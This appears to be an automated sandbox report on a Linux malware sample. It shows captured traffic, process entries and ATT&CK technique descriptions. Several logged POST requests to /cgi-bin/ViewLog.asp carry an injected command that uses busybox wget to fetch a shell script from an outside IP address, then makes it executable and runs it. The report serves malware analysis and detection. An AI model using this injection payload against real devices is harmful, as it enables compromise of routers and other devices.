70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2019 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2020 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans

Session ID	Source IP	Source Port	Destination IP	Destination Port
1322	192.168.2.15	41984	94.46.170.107	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:48.948050022 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:49.138403893 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:05:49 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {

Session ID	Source IP	Source Port	Destination IP	Destination Port
1323	192.168.2.15	48492	94.187.106.215	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:48.971729994 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1324	192.168.2.15	58082	95.163.12.95	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:48.976860046 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:49.194200039 CET	88	IN	HTTP/1.0 400 Bad Request Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a Data Ascii: Client sent an HTTP request to an HTTPS server.

Session ID	Source IP	Source Port	Destination IP	Destination Port
1325	192.168.2.15	59774	95.86.105.11	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:48.981086016 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1326	192.168.2.15	52154	94.123.248.123	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:48.984611034 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1327	192.168.2.15	47362	94.121.152.221	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:48.989651918 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1328	192.168.2.15	51806	94.120.233.89	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:48.993700981 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

System Behavior

Analysis Process: qynd1m1ejo.elf PID: 5880, Parent PID: 5803

General

Start time (UTC):	18:02:15
Start date (UTC):	25/02/2024
Path:	/tmp/qynd1m1ejo.elf
Arguments:	/tmp/qynd1m1ejo.elf
File size:	62224 bytes
MD5 hash:	bfedf409bceee1b2a8c3da0564b28cf0

Start time (UTC):	18:02:15
Start date (UTC):	25/02/2024
Path:	/tmp/qynd1m1ejo.elf
Arguments:	-
File size:	62224 bytes
MD5 hash:	bfedf409bceee1b2a8c3da0564b28cf0

Start time (UTC):	18:02:15
Start date (UTC):	25/02/2024
Path:	/tmp/qynd1m1ejo.elf
Arguments:	-
File size:	62224 bytes
MD5 hash:	bfedf409bceee1b2a8c3da0564b28cf0

Start time (UTC):	18:02:15
Start date (UTC):	25/02/2024
Path:	/tmp/qynd1m1ejo.elf
Arguments:	-
File size:	62224 bytes
MD5 hash:	bfedf409bceee1b2a8c3da0564b28cf0

Start time (UTC):	18:02:15
Start date (UTC):	25/02/2024
Path:	/tmp/qynd1m1ejo.elf
Arguments:	-
File size:	62224 bytes
MD5 hash:	bfedf409bceee1b2a8c3da0564b28cf0

Analysis Process: qynd1m1ejo.elf PID: 5885, Parent PID: 5883

General

Start time (UTC):	18:02:15
Start date (UTC):	25/02/2024
Path:	/tmp/qynd1m1ejo.elf
Arguments:	-
File size:	62224 bytes
MD5 hash:	bfedf409bceee1b2a8c3da0564b28cf0

Analysis Process: qynd1m1ejo.elf PID: 5886, Parent PID: 5883

General

Start time (UTC):	18:02:15
Start date (UTC):	25/02/2024
Path:	/tmp/qynd1m1ejo.elf
Arguments:	-
File size:	62224 bytes
MD5 hash:	bfedf409bceee1b2a8c3da0564b28cf0

Analysis Process: qynd1m1ejo.elf PID: 5888, Parent PID: 5883

General

Start time (UTC):	18:02:15
Start date (UTC):	25/02/2024
Path:	/tmp/qynd1m1ejo.elf
Arguments:	-
File size:	62224 bytes
MD5 hash:	bfedf409bceee1b2a8c3da0564b28cf0

Start time (UTC):	18:02:15
Start date (UTC):	25/02/2024
Path:	/tmp/qynd1m1ejo.elf
Arguments:	-
File size:	62224 bytes
MD5 hash:	bfedf409bceee1b2a8c3da0564b28cf0

Start time (UTC):	18:02:15
Start date (UTC):	25/02/2024
Path:	/tmp/qynd1m1ejo.elf
Arguments:	-
File size:	62224 bytes
MD5 hash:	bfedf409bceee1b2a8c3da0564b28cf0

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.
Tactics:	Impact
Data Sources:	Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report qynd1m1ejo.elf

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

DNS Queries

DNS Answers

HTTP Packets

System Behavior

Analysis Process: qynd1m1ejo.elf PID: 5880, Parent PID: 5803

General

Chronological Activities

Analysis Process: qynd1m1ejo.elf PID: 5881, Parent PID: 5880

General

Chronological Activities

Analysis Process: qynd1m1ejo.elf PID: 5882, Parent PID: 5880

General

Chronological Activities

Analysis Process: qynd1m1ejo.elf PID: 5883, Parent PID: 5880

General

Linux Analysis Report
qynd1m1ejo.elf